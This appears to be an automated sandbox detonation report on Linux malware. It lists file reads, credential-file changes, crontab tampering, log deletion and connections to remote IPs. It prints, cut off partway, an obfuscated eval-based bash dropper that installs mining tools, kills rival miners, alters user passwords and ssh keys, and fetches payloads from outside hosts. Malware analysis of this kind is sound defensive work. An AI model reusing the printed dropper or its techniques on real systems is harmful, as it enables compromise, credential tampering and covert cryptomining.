File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.4:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

137s

Max time network

150s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/357/maps /usr/sbin/needrestart N/A
File opened for reading /proc/441/maps /usr/sbin/needrestart N/A
File opened for reading /proc/584/maps /usr/sbin/needrestart N/A
File opened for reading /proc/891/maps /usr/sbin/needrestart N/A
File opened for reading /proc/418/maps /usr/sbin/needrestart N/A
File opened for reading /proc/575/maps /usr/sbin/needrestart N/A
File opened for reading /proc/773/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/825/maps /usr/sbin/needrestart N/A
File opened for reading /proc/583/maps /usr/sbin/needrestart N/A
File opened for reading /proc/749/maps /usr/sbin/needrestart N/A
File opened for reading /proc/756/maps /usr/sbin/needrestart N/A
File opened for reading /proc/766/maps /usr/sbin/needrestart N/A
File opened for reading /proc/787/maps /usr/sbin/needrestart N/A
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/752/maps /usr/sbin/needrestart N/A
File opened for reading /proc/783/maps /usr/sbin/needrestart N/A
File opened for reading /proc/789/maps /usr/sbin/needrestart N/A
File opened for reading /proc/818/maps /usr/sbin/needrestart N/A
File opened for reading /proc/827/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1909/stat /usr/bin/pkill N/A
File opened for reading /proc/22/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2321/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1945/cmdline /usr/bin/pkill N/A
File opened for reading /proc/783/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1074/ctty /usr/bin/pkill N/A
File opened for reading /proc/1995/cgroup /usr/bin/pkill N/A
File opened for reading /proc/33/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1924/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/28/status /usr/bin/pkill N/A
File opened for reading /proc/51/stat /usr/bin/pkill N/A
File opened for reading /proc/1997/ctty /usr/bin/pkill N/A
File opened for reading /proc/51/ctty /usr/bin/pkill N/A
File opened for reading /proc/1802/stat /usr/bin/pkill N/A
File opened for reading /proc/583/status /usr/bin/pkill N/A
File opened for reading /proc/825/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1881/stat /usr/bin/pkill N/A
File opened for reading /proc/2248/stat /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/opcode.py /usr/sbin/needrestart N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/stat /usr/bin/pkill N/A
File opened for reading /proc/1988/status /usr/bin/pkill N/A
File opened for reading /proc/785/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2296/stat /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/18/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/1691/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2478/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A
File opened for reading /proc/1/ctty /usr/bin/pkill N/A
File opened for reading /proc/2251/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1998/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1332/status /usr/bin/pkill N/A
File opened for reading /proc/35/ctty /usr/bin/pkill N/A
File opened for reading /proc/65/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1995/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2138/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1114/environ /usr/sbin/needrestart N/A
File opened for reading /proc/11/cgroup /usr/bin/pkill N/A
File opened for reading /proc/67/ctty /usr/bin/pkill N/A
File opened for reading /proc/2238/status /usr/bin/pkill N/A
File opened for reading /proc/2248/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2230/status /usr/bin/pkill N/A
File opened for reading /proc/48/status /usr/bin/pkill N/A
File opened for reading /proc/53/stat /usr/bin/pkill N/A
File opened for reading /proc/2/stat /usr/sbin/needrestart N/A
File opened for reading /proc/41/status /usr/sbin/needrestart N/A
File opened for reading /proc/1699/environ /usr/sbin/needrestart N/A
File opened for reading /proc/773/cmdline /usr/bin/pkill N/A
File opened for reading /proc/27/ctty /usr/bin/pkill N/A
File opened for reading /proc/40/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2118/cgroup /usr/bin/pkill N/A
File opened for reading /proc/583/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2248/stat /usr/bin/pkill N/A
File opened for reading /proc/1857/ctty /usr/bin/pkill N/A
File opened for reading /proc/1116/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1689/stat /usr/bin/pkill N/A
File opened for reading /proc/39/status /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$